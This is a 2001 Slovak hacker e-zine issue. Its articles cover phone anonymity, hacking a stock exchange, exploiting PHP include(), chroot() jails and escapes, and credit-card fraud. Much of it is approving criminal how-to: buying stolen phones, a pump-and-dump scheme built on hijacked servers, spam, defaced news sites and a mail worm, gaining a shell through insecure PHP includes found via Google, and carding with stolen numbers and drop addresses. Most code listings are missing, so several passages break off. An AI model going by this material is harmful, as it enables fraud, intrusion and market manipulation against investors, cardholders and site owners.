::::::::::. :::::::.. :::.,:::::: ::: ... . : `;;;```.;;;;;;;``;;;; ;;;;;;;'''' ;;; .;;;;;;;. ;;,. ;;; `]]nnn]]' [[[,/[[[' [[[ [[cccc [[[ ,[[ \[[,[[[[, ,[[[[, $$$"" $$$$$$c $$$ $$"""" $$' $$$, $$$$$$$$$$$"$$$ 888o 888b "88bo,888 888oo,__ o88oo,.__"888,_ _,88P888 Y88" 888o YMMMb MMMM "W" MMM """"YUMMM""""YUMMM "YMMMMMP" MMM M' "MMM prielom #16, 14.03.01 , prielom(at)hysteria.sk, http://hysteria.sk/prielom/
intro
hackerov sprievodca po galaxii anonymity
ako hacknut burzu
php nase kazdodenne
ako robit chroot() klietku
sk/cz carding update
board
pise sa rok 2001. vsetci hovoria nieco o vrcholiacej technickej revolucii. vsetci hovoria o pocitacoch, o internete, o kozme, o genetike, o psychologii. showbiz prekypuje. a sny sa stavaju skutocnostou, no my si to neuvedomujeme, pretoze uz mame dalsie. matrix prichadza, vznika, rozvija a rozpina sa. zacina oblokopovat zem. infrastruktura. system. to. mobilne telefony, mobilne asistenty, diare, handheldy, notebooky, pcmcia gsm modemy, gprs, gps, satelity, anteny, siete. sme napojeni. sme pripojeni. identifikujeme miesta vasho pobytu pomocou vyrobneho cisla telefonnej karty, ktoru pouzijete. vyhladame si dane miesto sledovacou kamerou umiestnenou na nedalekom rohu (povodne "kvoli zvyseniu bezpecnosti v centre mesta"), ak sa tam kamera nenachadza a vy ste pomerne dolezity objekt sledovania, pouzijeme satelity s moznostou rozlisenia tvare osoby. zistime kam volate, vyhladame si udaje o osobe v centralnej databaze nsa, fbi, cia a interpolu. pripojima sa na vas mobil, na mobily vsetkych okolo vas. pomocou sledovacich kamier umiestennych v mestach, v obchodoch, na zachodoch, v restauraciach vas budeme sledovat po 90% dna. matrix ta ma. matrix, alebo gaia. siet sieti. ono. tele ktoreho bunkami su mozgy ludi. pripojene mozgy. nervove spoje, miliony, miliardy, zosietovane najjemnejsimi vlaknami a nasledne napojene na pocitacove monitory, na modemy, na siet sieti. bunky uplne saleju ako nasavaju gigabajty informacii, zvysuju svoju kapacitu, zlepsuju sa. a gaia, mocna a stale sa rozvijajuca vyrasta, prekvita a zije svojim vlastnym zivotom. dokonale riadena teoriou chaosu. dokonaly fraktal nekonecne sa opakujuci a narastajuci, spatna vazba s kazdym krokom niekolkonasobne silnejsia. a v nej navrstvene vsetko dobre a zle, co vzniklo v ludoch. najnizsie kasty, orac, pastier dobytka az po najvyssich japonskych topmanazerov hladiaci na svoje titanove hodinky pri telefonovani z ich satelitneho telefonu. dokonale napojeni na gaiu a nicnetusiaci o jej existencii. gaia, suhra protikladov. kde podla komplexnych pravidiel bije jedna sila druhu. jing proti yang, cirna proti bielej. chudoba proti bohatstvu. komunizmus versus kapitalizmus. mmf versus pankaci. skini versus cierni. zirafa, blcha, einstein, rolnik. absolutne jemny a presny pomer medzi tymito silami drzi gaiu v idealnej rovnovahe a umoznuje jej rast, rozvijat sa.
niko(at)hysteria.sk
hackerov sprievodca po galaxii anonymity
...alebo ako prevzat kontrolu nad svojim sukromim
asi som privacy freak - potrpim si na sukromie a anonymitu. ked idem po
centre blavy a citim na chrbte pohlad jednej z poulicnych kamier mestskej
policie, znervozniem. ked si vyberam peniaze z bankomatu a civiem do oka
zabudovanej kamery, pohladom nenavistne zaganim na imaginarneho straznika, ktory cumi na
kontrolne monitory niekde v utrobach banky. alebo si zasuniem silt ciapky hlbsie do cela. nic mi to ale nepomoze, lebo v centrale banky aj tak okamzite vznikne elektronicky zaznam kedy, z ktoreho bankomatu a kolko penazi som si vytiahol. niekto v banke ma v
tej chvili presnu informaciu o tom, kde sa prave nachadzam. ked mam vo
vrecku zapnuty mobil som ako rybicka v akvariu - mobilny operator vie
kedykolvek lokalizovat moju polohu zhruba na 5 metrov. je na case vziat veci
pod vlastnu kontrolu. o tom je tento clanok.
anonymny mobil
anonymne predplatne gsm karty zmizli na slovensku kratko po uvedeni na trh.
na prikaz ministerstva sa teraz pri kupe predplatenej karty musi
kupujuci preukazat obcianskym preukazom. jedna moznost je pouzit napriklad cesku
prepaid kartu (go, twist, oskar), tie sa daju v susednom svedsku kupit bez
obcianky a maju aj roaming na slovensku. na dlhodobe pouzivanie
je to ale trochu drahe kafe. je ale vela moznosti ako kupit slovensku
predplatenu kartu registrovanu na niekoho cudzieho. videl som zopar
inzeratov v avize, da sa oslovit nejaky sfetovany petrzalsky narkoman aby isiel kupit
zo desat easy kariet, a podobne :).
okrem cisla SIM karty sa vsak pri kazdom telefonate loguje aj IMEI identifikacne cislo samotneho mobilneho telefonu (viz *#06# na nokiach). preto je samozrejme z pohladu anonymity blbost pouzivat registrovany telefon na vlastnu osobu. tu je najidealnejsie kupit kradnuty mobil v zalozni, alebo kupit mobil na inzerat - vacsinou sa jedna o dovozove akciove odblokovane kusy. ja sam som kupil nokiu 7110 na inzerat v avize od takeho
petrzalskeho mafianka. ked som si preveroval na koho je ten aparat pisany,
tak je to akciovy mobil pisany na nejaku pochybnu sro-cku v nitre. proste pohoda.
zostava nam doriesit posledny problem. mobilny telefon naraz komunikuje az
s deviatimi bts-kami. kazda bts-ka ma moznost zaznamenavat s kym
komunikuje a aku silu ma signal. z tychto udajov je mozne vyratat kde sa
clovek nachadza. na slovensku dokazu operatori gsm lokalizovat cloveka v meste
zhruba na 5 metrov. mimo mesta je to radovo na desiatky metrov, zavisi to samozrejme
na tom s kolkymi bts-kami naraz mobil vykecava. je znama
vec ze obaja nasi mobilni operatori maju okrem "odpocuvacej miestnosti"
urcenej pre policiu aj umiestnenu "ciernu
skrinku" od slovenskej informacnej sluzby. co ta skrinka presne loguje asi
nevie nik. ci su to aj udaje o fyzickej lokalizacii mobilnych stanic to
pochybujem. ani samotni gsm operatori v sucasnosti neloguju fyzicku lokalizaciu uzivatelov mobilov. ale co
nebolo moze byt. v roku 2003 by mal prist na trh bezny
3,5" hard disk s kapacitou 1 TB. ak ratame s dnesnou technologiou
diskovych poli, mozeme predpokladat ze do jedneho standardneho 19" racku
vojde cc 100-150 TB. pre mobilneho operatora ci sis-ku potom nebude
problem logovat vsetky telefonaty a vsetky X-Y-Z koordinaty ucastnikov, no proste budu moct
logovat *uplne vsetko*, a kludne aj x rokov dozadu.
teraz vam uz pripadam asi prehnane paranoidny. kto by sa v sis-ke asi tak
zaujimal o mna, bezneho konzumenta rozkov s mliekom. nuz nemusi to byt len sis.
bol som na prezentacii novych technologii firmy motorola a ukazovali tam
taky futuristicky reklamny spot o novom umts telefone. na reklame ho mala
taka sexi dievcinka a ked prechadzala s tym telefonom po obchodnom dome
okolo predajne s kozusinami, automaticky jej prisla graficka sms sprava o
tom ze vo vnutri v tom obchode maju zlacnene nejake kozenne bundy, cico.
raz pojdete autom po dialnici a z motorestu vam pride sms-ka s pozvanim na
zlacnenu kavu a kremese. fuj - nie dakujem. ked pre nic ine, tak pre toto
by ste si mali upravit telefon tak, aby kecal v danom momente len s jednou
bts-kou. tak je nemozne lokalizovat aparat. maximalne je mozne nakreslit
okolo aktivnej bts-ky kruh v ktorom sa nachadzate, a to postacuje na to
aby vas nelokalizovala sis-ka pokial ste tajny rusky agent, alebo na to
aby vam v buducnosti nechodila "lokalizovana reklama" ako babenke z
reklamy. ako na to ? nuz tu je strucny navod na to ako sa da
nakonfigurovat mobilny telefon nokia tak, aby komunikoval len s jednou
bts-kou (malo by to fungovat minimalne na 6110, 6150, 6210 a 7110):
...nabuduce pokracovanie o tom ako sme skusali spravit si anonymnu obcianku a konto v banke..
navrat na obsah
ako hacknut burzu
v minulom cisle prielomu sme sa naucili ako hackovat banky. aby ste nehovorili ze som
prilis skromny, tentoraz naburame nieco poriadne. hackneme burzu cennych papierov. nie je
to take tazke ako by si ludia (rozumej priemerny ferko pejko) mysleli. takze podme na to.
hackovanie informacii
nas ciel je hacknut burzu. burza je premietnutie informacii ktore ma trh o jednotlivych firmach ci celkovom ekonomickom prostredi do numerickej podoby vo forme cien akcii, dlhopisov, opcii, atd. cena akcie konkretnej firmy nie je nicim inym ako kvantifikovanim optimizmu investorov v jej buducnost. inak povedane, cena akcie nejakej firmy zavisi od verejne znamych informacii suvisiacich s jej aktivitami. preto ak chceme hackovat burzu, musime hackovat informacie. a v tom sme predsa doma, pretoze informacie sa v dnesnom svete vytvaraju, pohybuju a archivuju vo forme bitov. drviva vacsina informacii podla ktorych trh urci cenu akcii preteka svetom v podobe jednotiek a nul. a o tom je hackovanie - obracat nuly na jednotky a jednotky na nuly.
priprava
co potrebujeme na to aby sme hackli burzu? vytiahnite si pero a papier a piste si recept.
tak najprv potrebujeme cloveka schopneho pisat stredne zlozite perlovske scripty. budeme potrebovat aj zopar desiatok hacknutych "gateway" masin po celom svete. idealne su masiny typu "zabudnuty PC-linux na svedskej strednej skole" ktore si pospinkavaju nezatazene na solidnej linke. a to je vlastne vsetko. suma sumarum by nam malo stacit zopar sto tisic korun a to som uz do ceny zaratal aj vsetko pivo a pizzu, no a samozrejme nas pociatocny vklad do akcii na burze. naklady su teda podstatne nizsie ako v minulom dieli ked sme hackovai banku. a pritom vynosy budu mnohonasobne vyssie. takze hura na to.
ciel
ktoru burzu si vyberieme ? kedze zarabat budeme tym ze budeme podvrhovat drobnym a strednym investorom falosne informacie o vybranych akciach, musime si najst burzu kde najdeme dost takychto ferkov pejkov. preto nam vypadava z hry slovenska burza cennych papierov, lebo na slovensku sa absolutne neda hovorit o nejakych drobnych ci strednych investoroch. na nasom trhu je len maly pocet velkych hracov ktorych nebudeme vediet okaslat. zato v takej amerike napriklad ma kazda spravna rodina aspon 100 akcii IBM, 100 akcii coca-coly a detom pri narodeni kupuju 20-rocny dlhopis Disney. stado dementnej konzumnej populacie nachadzajuce sa na druhej strane velkej mlaky je presne to co potrebujeme pre nas plan.
utok
najprv si musime spravit databazu vsetkych diskusnych skupin, ktore sa tykaju financneho sveta, pocnuc yahoo finance a konciac pri beznych newsgroupoch. pripravime si scripty, ktore budu schopne cez nase gateway masiny po celom svete automaticky postovat pripravene spravy na tieto diskusne skupiny. floodovanie diskusnych skupin je nam dobre zname z inych hackerskych aktivit, takze to nemusim asi podrobnejsie popisovat. staci na to par-riadkovy shell-ovy script, ktory bude cez netcat vrhat http POST prikazy. bude sa nam hodit aj databaza e-mail adries novinarov roznych periodik, ci uz on-line alebo tlacenych ktore sa zaoberaju burzou s cennymi papiermi.
co budeme vlastne hackovat? budeme hackovat cenu nami vybranej akcie. najdeme si nejaku firmu s verejne obchodovanymi akciami, ktora ma brutalne nizku cenu. napriklad nejaka zacinajuca high-tech firma z indickeho bangaloru, ktora sa zaobera vyvojom optickych interface media konvertorov (alebo cokolvek ine high-tech, comu sa bezny american nerozumie ani makovy prd). takato idealna firma nesmie byt zase az taky novacik - musi byt aspon rok po neuspesnom IPO (prvotne ponuknutie akcii na verejnej burze) a odvtedy jej cena pomaly ale isto klesa na nejaku nechutnu cenu, napriklad 1-2 dolare za akciu. proste shit, ktory nikto nechce. a my z nich za par dni spravime horuci artikel, hehe.
v prvom rade nakupime kopec akcii tejto zdochynajucej firmy. kedze cena je 1-2 dolare za kus, nebude pre nas problem nakupit ich zopar desat tisic, samozrejme vsetko anonymne prostrednictvom off-shorovych on-line brokerov.
informacnu vojnu spustime naraz na niekolkych frontoch. v prvom rade vygenerujeme niekolko sprav, ktore okraslia nasu indicku firmu a zacneme ich spamovat a posielat do nasej databazy diskusnych skupin. idealna je prevratna sprava, napriklad, ze v tejto bangalorskej firme prisli na to ako ztrojnasobit rychlost svetla v optickom kabli a tym zostonasobit rychlost prenosu dat (heh, nevadi ze je to doneba volajuca blbost, americky investor nevie nic o rychlosti svetla a fyzike vseobecne *grin*). spravu podpiseme ako nejaky insider, ktory sa nahodne dozvedel tuto senzacnu informaciu, ktoru indicky manazment iste na koniec kvartalu zverejni. vsetko musi vyzerat tak, ze cena akcii tejto indickej firmy cochvila prudko stupne do nebeskych vysin.
zaroven zacneme hackovat weby. ale-ale, nebodaj sa uskrnate nad tym ze hackovanie webovskych stranok a-la cZert alebo binary division su len zartiky unudenych pubertakov, ktori tuzia po zviditelneni? ale kdeze, web je dnes verejnostou z pohladu hodnovernosti pokladany
za rovnocenny zdroj informacii ako klasicke media (TV, noviny, radio..). a je to cim dalej popularnejsi zdroj informacii, koli vyhodam ktore klasicke media neposkytuju. doba sa meni. ked SERT hackol v roku 1996 webovsku stranku tlacovej agentury slovenskej republiky (tasr) a zmenil text tlacovej spravy, vsetci to brali ako viac-menej neskodnu hackersku recesiu. vtedy bola totiz stranka www.tasr.sk akurat progresivny test novej technologie (akoze www), ktory ale nevyuzival nikto s vynimkou zopar zahranicnych slovakov, tuziacich po cerstvych spravach z domoviny. dnes je to inak. tlacove spravy sa neprenasaju faxom ci teletextom ako v minulosti, web sluzi novinarom ci verejnosti ako *primarny* zdroj informacii.
ak by dnes SERT hackol stranku www.tasr.sk, ci www.sita.sk a modifikoval tam tlacovu spravu, s najvacsou pravdepodobnostou by takto "upravenu" spravu okamzite prebrali dalsi novinari a na druhy den by ste sa ju docitali v kazdych tlacenych novinach. a pritom zabezpecenie webovskych serverov sa od roku 1996 velmi relativne voci naskoku hackerov nezmenilo. binary division upozornuje na to ze webovske servre straziace senzitivne informacie maju z pohladu bezpecnosti este velmi daleko od dokonalosti. berte ich vazne.
ale podme naspat k nasej indickej firme. najmeme si zopar ludi, pre ktorych nebude problem hacknut www stranky periodik, ktore citaju investori, ci priam domovsku stranku danej indickej firmy a zverejnit tam trebars prikraslenu vyrocnu spravu.
informacny utok zakoncime poriadnym mejlovym spamom. vsetky nase vymyslene informacie vo forme e-mailu rozposleme novinarom, obchodnikom s cennymi papiermi, investorom, atd. nas spam uskutocnime cez jeden z mnozstva smtp serverov na internete, ktore dovoluju smtp relaying, pripadne priamo z nasich gateway strojov. pouzijeme databazy e-mail adries ziskanych zo scanov webu, scanov finger sluzieb, scanov VRFY a EXPN funkcii sendmailu, atd. zaujimavym variantom by mohol byt worm typu "ILOVEYOU", ktory by sa dostal do schranky nejakemu investorovi a poslal by pod jeho menom a s jeho podpisom e-mail vsetkym znamym z address-booku outlooku so spravickou o senzacnych informaciach o jednej indickej high-tech firme..
moznosti informacnej vojny su naozaj rozsiahle, staci ked si len citate kadejake spravy o "neskodnych hackeroch" a "neskodnych hackoch www stranok" a prenesiete si to do sveta financii kde sa tocia miliardy dolarov a kde ma kazda informacia nevycislitelnu cenu.
informacna kampan sposobi nevidany zaujem o akcie nasej firmy. kedze je cena je len 1-2 dolare, tak vobec nebude prekvapujuce ak sa v priebehu niekolkych dni vdaka zvysenemu zaujmu investorov zniekolkonasobi a vysplha minimalne na 10 dolarov za kus. vtedy predame akcie a tak sme za niekolko dni dosiahli niekolko-sto percentny zisk. podstatne je uvedomit si, ze obchodovanie s akciami casto nema realne zaklady a sprava sa podla psychologie davu. preto uvedeny postup spravime niekolkokrat za sebou vzdy na inu firmu v inej casti planety a vzdy so zarucenym ziskom. potom sa vyparime zo sceny na sukromnom jete a pozveme binary division na after-party v prazskej laser game arene.
sirenie falosnych informacii o verejne obchodovanych cennych papieroch je samozrejme v rozpore so zakonom vo vacsine krajin sveta. americky vladny kontrolny organ SEC (securities and exchange comission), ktora ma na starosti patranie po takych darebakoch ako sme my, ma v tejto oblasti roky praxe. SEC ma nasadene pocitace na burzach od nasdaq-u az po wall street a tie sleduju akekolvek podozrive obchody. za klasicky podozrivy obchod z pohladu SEC sa poklada situacia, ked niekto v kratkom case kupi a preda akcie, ktore pocas toho kratkeho obdobia podstatne zmenili hodnotu. proste vsetky obchody ktore vyzeraju prilis dobre na to, aby mohli byt poctive. vtedy sa spusti na pocitacoch SEC cervene svetielko, signal sa vysle do centraly SEC a oni okamzite uvolnia z hybernacie armadu agentov FBI ktori do toho zacnu rypat.
dost som cital o praci SEC a obcas sa im fakt podari chytit aj malu rybu v riadne zamotanom pripade. napriklad sa stala taka vec, ze manzelka riaditela istej americkej firmy chodila k svojmu psychologovi a stazovala sa ze "manzel je akysi nervozny koli nejakej akvizicii co teraz vo firme chystaju". nuz a ten psycholog nelenil a utekal rychlo nakupit akcie danej firmy. po oficialnom ohlaseni akvizicie cena akcii rapidne stupla a psycholog nasledne spenazil rychly zisk. a SEC ho pri tom lapili. v newsweeku som cital o pripade 17-rocneho chalana, ktory postoval na diskusne skupiny na webe falosne spravy o akejsi bankrotujucej hong-kongskej firme a ked akcie stupli, skvele zarobil. ked ho SEC nasli a prikvitli k nemu na navstevu, nasli ho v novom dome ktory zasponzoroval svojim rodicom a prekvapeny otec prave parkoval novy m-class mercedes a tvrdil ze jeho syncek sa nedopustil ziadneho trestneho cinu, akurat je zlahka genialny. newsweek uvadza ze sa stastna rodinka dohodla s SEC na mimosudnom vyrovnani. kedze je predpoklad ze im boli schopni dokazat len tychto informacnych hackov, myslim ze si otecko v pohode ponechal m-ko mercedes a zostalo mu aj na zdrazeny benzin.
nuz ale to je v usa... dokazali by slovenski ci ceski policajti dolapit tvorcu spamov, falosnych postingov ci autora www hacku? takyto pripad v nasich zemepisnych sirkach nema obdoby, este nikdy nebol u nas obvineny a nieto este odsudeny ziaden hacker za hacknutie www stranky.. a to u nas "padli" stranky ministerstiev, bank, poistovni, ci najznamejsich portalov. preto ked minieme vsetky peniaze z hacknutia burzy, v pohode sa vratime na scenu a vsetko mozeme beztrestne zopaknut. opat skvele zarobime.
hack the planet
hackovanim informacii dokazeme hacknut nielen burzu, dokazeme splnit sen kazdeho hackera:
dokazeme hacknut celu planetu. to co plati pre burzu zacina platit pre cely svet. hodnoty
ktore vytvarame na tejto planete sa totiz pomaly ale isto presuvaju z hmotneho sveta
atomov do bezvahoveho sveta bitov.
vsetky ucebnice ekonomie, ktore nam tlacia do hlavy na univerzitach, su pisane o atomoch. makroekonomicke teorie od adama smitha az po samuelsona sa zaoberaju vytvaranim atomov ci obchodom s atomami (veci, predmety, vyrobky). tieto teorie a poucky prestavaju fungovat v novej ekonomike, ktora nam tu vznika. ked sa v oktobri stretli v prahe vrcholni ekonomovia a politici na summite svetovej banky (wb) a medzinarodneho menoveho fondu (imf), diskutovali hlavne o pohybe a distribucii atomov (jedlo, vyrobky, chemikalie, atd). bity - kombinacie jednotiek a nul ale menia planetu a ekonomiu tak ako ju pozname. bity sa stavaju najziadanejsim obchodnym artiklom.
hackovanie poznania
bity znamenaju informacie. informacie znamenaju vedomosti. firmy sa coraz viac tocia okolo vedomosti. robit veci lepsie a jednoduchsie bol od veky vekov hlavny zdroj ekonomickeho rastu. co je vsak nove je ze mnozstvo modernych firiem nevyraba "hmotne" veci, ale "nehmotne" bity. niektori to volaju "bezvahova ekonomika". zaujimavostou je ze aj klasicke produkty maju v sebe "obsiahnute" vedomosti, cize nehmotne bity. ci su to volkswagen auta z blavy, alebo topanky z partizanskeho - vsetky maju v sebe "obsiahnute vedomosti" vo forme sofistikovaneho CAD dizajnu, ci zakaznickych sluzieb.
napriek tomu vacsina mocnych tohoto sveta stale keca len o atomoch. ked sa uz spominani pani z medzinarodneho menoveho fondu ci svetovej obchodnej organizacie (wto) stretli v prahe, hovorili o daniach z pridanej hodnoty, colnych sadzbach, dovoznych kvotach a podobnych pravidlach stvorenych pre svet atomov, ktore ale vo svete bitov vobec nefunguju (viete si predstavit dovoznu kvotu na pocet downloadnutych megabajtov antivirovych programov na slovensko, tak ako je napriklad dovozna kvota na mnozstvo piva, ktore sa moze doviezt na slovensko ?). nedivme sa ale ekonomom, ze im bity nechutia. pomaly by totiz mohli koli tym malym nehmotnym parchantom vyhodit z okna vsetky stare ucebnice. bity sa totiz od atomov principialne lisia v niekolkych zakladnych veciach, na ktorych su postavene fundamentalne teorie ekonomie. napriklad to, ze bity sa lahko reprodukuju. predstavte si, ze vlastnite nejake atomy, napriklad jablko. ak to jablko niekomu predate, zaraz prestanete byt majitelom toho jablka. to pre bity neplati - daju sa reprodukovat zadarmo a nekonecne. ak predate softver, stale vlastnite jeho povodnu kopiu, ktora je rovnako hodnotna a kvalitna. prestavaju fungovat klasicke vztahy dopytu a ponuky z pohladu makroekonomiky. prestavaju tiez fungovat fixne a variabilne naklady z pohladu mikroekonomiky (variabilne neexistuju lebo vyrobit jeden softverovy program alebo milion identickych softverovych programov stoji tolko isto). ale o tom podrobnejsie inokedy.
podstatne je, ze bity budu hrat coraz dolezitejsiu rolu. a ludia, ktori budu vediet vytvarat hodnotne bity budu ceneni. a ti, ktori ich budu vediet prenasat a menit budu este cennejsi. preto bude hacker najdolezitejsie povolanie buduceho storocia :) ale ak si spominate o tom sme uz pisali v prielome 6, v clanku hacker - sexualny idol informacneho veku ;). aspon teraz chapete ze som to vtedy nemyslel len tak zo zartu. tak vam teraz s vaznym ksichtom prajem do noveho tisirocia vela hacknutych bitov. zacnite tou burzou.
pajkus
navrat na obsah
php nase kazdodenne
lahky uvod
doba pokrocila. na novotou sa blyskajucom serveri najde nas stary znamy maliar po rozbaleni z krabice uz aj nainstalovany webserver s php (php hypertext preprocessor). kupi si prirucku a hybaj ho programovat elektronicky obchod, ved je to prave trendy. dopadne to obvykle zalostne, kazdy chce vsetko hned a na bezpecnost sa mysli uz v poslednom rade, ake typicke. onedlho zisti, ze pisat stale sa opakujuci html kod do len malo sa meniacich stranok, pripadne framov, je otravne. ved moze jednoducho vlozit meniaci sa text dynamicky do pripravenej html sablony - a objavi funkcie include() a require()...
exploitovanie
inkriminovany vycuc z php kodu obvykle vyzera nasledovne:
bez akejkolvek kontroly vstupu, obmedzenia. potom sa uz len nestiha divit. dosledok je taky, ze ktokolvek si moze lubovolne precitat akykolvek subor na disku, ktory ma uzivatel, pod ktoreho pravami bezi webserver, pravo precitat. a to nie je vsetko, to najlepsie este len caka na svoju prilezitost, takemuto skriptu moze ktokolvek podvrhnut aj url ineho dokumentu, ktory on pekne bez vsetkeho spapka a interpretuje. vravi sa tomu aj cross-site scripting. vratme sa k maliarovi, prave si rozbehol svoj obchod na adresa e-shop.maliar.com, kde ponuka obsah svojho disku svetu.
postup: zacneme pripravou skriptu. najjednoduchsi sposob ako ziskat shell, je pouzit inetd, no fantazii a zbytocnemu a zlozitemu prekombinovavaniu sa medze nekladu:
priprava hotova, uz len staci do zlatista upiect nase suroviny:
ochrana
rozne mutacie podobnych skriptov sa casto vyskytuju v par modifikaciach, ktore zmenia formu zneuzitelnosti, pripadne posluzia ako ucinny filter. ako uvidime, niekedy staci naozaj malo.
include($source."suffix")
include("prefix".$source)
include("prefix".$source."suffix")
aby sme znizili riziko zneuzitia skriptov pisanych uzivatelmi na nasom serveri, nastavime zopar zakladnych bezpecnostnych opatreni v konfiguracii php:
vyhladavanie
fajn, uz vieme akych chyb sa programatori dopustaju, vieme ako je mozne ich zneuzit. ale este sme si nepovedali ako taketo chyby najdeme. na prvy pohlad sa to zda byt prilis zlozite, ovela zlozitejsie ako nejaky trivialny sken na urcitu verziu niektoreho zo sietovych daemonov. skor nez sa pustime do pisania komplexneho skeneru, trochu ponamahame svoju sedu mozgovu koru a uvedomime si, ze takyto sken uz davno spravil za nas niekto iny. konkretne roboty fulltextovych vyhladavacich sluzieb, tak naco znovu vynachadzat koleso? pokusime sa vzit do role takeho bezneho programatora - ako by sme nazvali parameter/premennu s takouto funkciou? ako co najviac eliminovat plane poplachy a odkazy do databaz? ktory prehladavac pouzit?
zacneme poslednou otazkou, odpovedou je google. je zbytocne polemizovat o tom, ze je to v sucasnej dobe najkvalitnejsi fulltextovy vyhladavac na inaternete a ma vsetky vlastnosti, ktore prave potrebujeme. pouzijeme pokrocile vyhladavanie a zadame nase prve query:
odkazy
netcat: http://www.l0pht.com/~weld/netcat/ - verzie pre unix aj windoze
salo
navrat na obsah
ako robit chroot() klietku
na chroot() sa nejak pozabudlo.. je tu s nami od pociatku unix-u a velmi sa nepouziva, ci uz na urovni aplikacii (vynimkou je mozno rozsireny wu-ftpd), alebo administratormi na urovni celeho unixoveho systemu. tento clanok je o tom ako pouzit systemovy call chroot() na vytvorenie dodatocnej urovne bezpecnosti pri spustani untrusted aplikacii a sucasne aj o tom ako hacknut takto zabezpeceny system.
uvod do chroot()
najprv strucne trochu teorie. chroot() je unixovy systemovy call, ktory sa pouziva na vytvorenie akehosi autonomneho sveta vo vnutri UNIXoveho systemu na zvysenie bezpecnosti. kernel na unix-ovych systemoch, ktore podporuju chroot() si drzi zaznam o rootovskom adresari pre kazdy jeden proces na danom systeme. zvycajne je to "/", ale systemovy call chroot() to vie zmenit. syntax je jednoduchy, staci zbehnut chroot() s parametrom vytuzeneho adresara, napr. "/users/home/":
zmena rootovskeho adresara sposobi to, ze vsetky programy, ktore budu v tomto novom zivotnom prostredi pobehovat budu potrebovat kadejake subory, kniznice a programy. chroot() prostredie som konfiguroval len par-krat v zivote, a nikdy sa mi nepodarilo dopracovat sa k nejakemu zmysluplnemu zoznamu fajlov a kniznic, ktore potrebujeme do novovytvoreneho chroot() sveta prekopirovat. v kazdom pripade to zavisi od presneho typu operacneho systemu a potom od toho co tam potrebujeme bezat, vsakze. na vytvorenie jednoducheho chroot() sveta, v ktorom sa da spustit sh som na solarise potreboval:
kedy je dobre pouzit chroot() prostredie ? definitivne by som ho doporucil na sietove sluzby, ktore su notoricky zname ako problemove z hladiska security, ako napriklad bind. nie je vsak odveci spravit chroot aj na nieco vacsie typu httpd, alebo vytvorit chroot prostredie na uzivatelske konta.
rozbijame chroot()
aj ked je chroot() slusne zabezpeceny, je mozne sa programovo vymamit z jeho klietky. pokial aplikaciu spustime s uid 0 pravami, dokazeme sa dostan von z chroot prostredia. potrebujeme k tomu nasledovne veci:
predstavme si situaciu, ze chceme hacknut www server, ktory pouziva chroot prostredie na spustanie kadejakych "nebezpecnych" uzivatelskych CGI skriptov. mozeme predpokladat, ze v takomto prostredi mame pristup k Perl binarke. potom je ziskanie root prava na celom systeme otazkou ziskania rootovskych prav cez bezpecnostnu dieru v chrootovom prostredi webovskeho servera. toto samozrejme nie je predmetom tohoto clanku, ale utocnik moze ziskat uid 0 cez dieru v aplikacii, ktora bezi setuid-root. v dobre nakonfigurovanom chroot prostredi by samozrejme takychto aplikacii malo byt minimalne, alebo najlepsie ziadne. treba ale poznamenat, ze udrziavat si taketo bezpecne chroot prostredie nie je lahka vec, napriklad bezne patche, ktore nam fixuju nase systemove binarky nic netusia o chroot prostredi. je jednoznacne prioritou kontrolovat ci sa v chroot prostredi nevyskytuju setuid binarky.
ak sa chceme prebit von z chroot prostredia, program musi vykonat nasledovne veci:
tento druh utoku bol tiez pouzity aj pri exploite proti wu-ftpd FTP daemonovi, ktory bol postnuty na BugTraq 25/3/1999.. da sa najst na http://www.securityfocus.com/archive/1/12962
na zaver by sa asi malo spomenut, ze nie vsetky odrody unixu sa daju takto napadnut. freebsd 4.x a vyssie maju lepsi chroot() systemovy call. v pripade ak ma process file descriptory v momentalnom directory, freebsd odmietne spravit chroot. blizsie info o tomto sa da najst v manualovej stranke chroot() na free bsd 4.x, pripadne na manualovej stranke k jail(), ktory pouziva chroot() a dokaze pod freebsd dalej limitovat procesy.
preklad + dodatok by pajkus..
navrat na obsah
sk/cz carding update
Lets call this article "Slovak and Czech carding upgrade". Co potrebujeme ku kardingu? Cloveka ochotneho riskovat krk [na pohlavi, veku a rase nezalezi] tento modelovy pripad vsak zahrna typ: muz, beloch, vek 24. Kazdy nech si parametre configne sam. V ziadnom pripade nie je pravda ze carder alebo clovek zaoberajuci sa credit fraud musi by hackerom, dalsia odporucana konfiguracia je nadpriemerne inteligentny, paranoidny a zbehly uzivatel. Neodporucame skusat zaciatocnikom na nete. Typy kokot, nenazranec a blbec su absolutne nevhodne, tieto typy vas privedu na pokraj sialenstva, ako sa budu vsade chvastat co vsetko maju, co dokazali a kolko toho nacardovali, jeden taky sa vyskytol aj v nedavnych prispevkoch na slovenskych spravodajskych servroch. Boh ho ochranuj.
Dalsim predpokladom spravneho a uspesneho cardingu je vediet co chceme.. zial cez internet sa nedaju bezpecne nakupovat jachty, domy, ani dlhonohe blondiny, ale inak skoro vsetko. my sa zamerajme radsej na vypoctovu techniku. Procesory, pamate, dosky, zvukovice, sietovice, grafice, tlaciarne, monitory, vsetok tento tovar moze "bezpecne" skoncit u vas.
Ok vieme kto sme, vieme co chceme ale ako to dostat? Treba cisla, pre neznalych cisla kreditnych/debetnych kariet zo serii VISA, MASTERCARD, AMEX, DINERS CLUB, JCB, .... Tieto ziskame rozlicnymi sposobmi, na slovensku sa vyskytuju zivocichy druhoveho nazvu HACKER kreditny, ktori sa specializuju na napadanie servrov, kde bezia online obchody alebo databazy klientov, vid. slovenska sporitelna a zahadny prienik? Na co su mi udaje zo svidnika? Ehm na nic, keby tam boli aspon rodne cisla ludi, ich obcianske preukazy tak uz by to malo svoj vyznam, ale to, kto, kde a ake auto vlastni je mi na ni. OK Open source je mozno linux, ale vo svete cardingu nie je nic zadara, vyzaduje to byt zdatny v kradnuti cisiel (fyzicky/elektronicky) alebo si cisla kupit... proste bud si cisla hacknes sam, alebo sa dohodnes s hackermi ktori behaju po zaujimavych serveroch.. chodnicky computer undergroundu su spletite...
Uz mame skoro vsetko co potrebujeme na uspesne cardovanie, teraz potrebujeme miesto kam si to nechame poslat, najlepsie je ak clovek byva u niekoho, rodina kde pracuje ako au-pair, znami, alebo after party morning v neznamom dome. alternativou je opusteny dom, alebo aspon opustena schranka, pripadne doinstalovat si vlastnu schranku do petrzalskeho panelaku.. take nieco.. OK Najdeme si ten spravny shop objedname a a uz iba pockame na dorucenie.
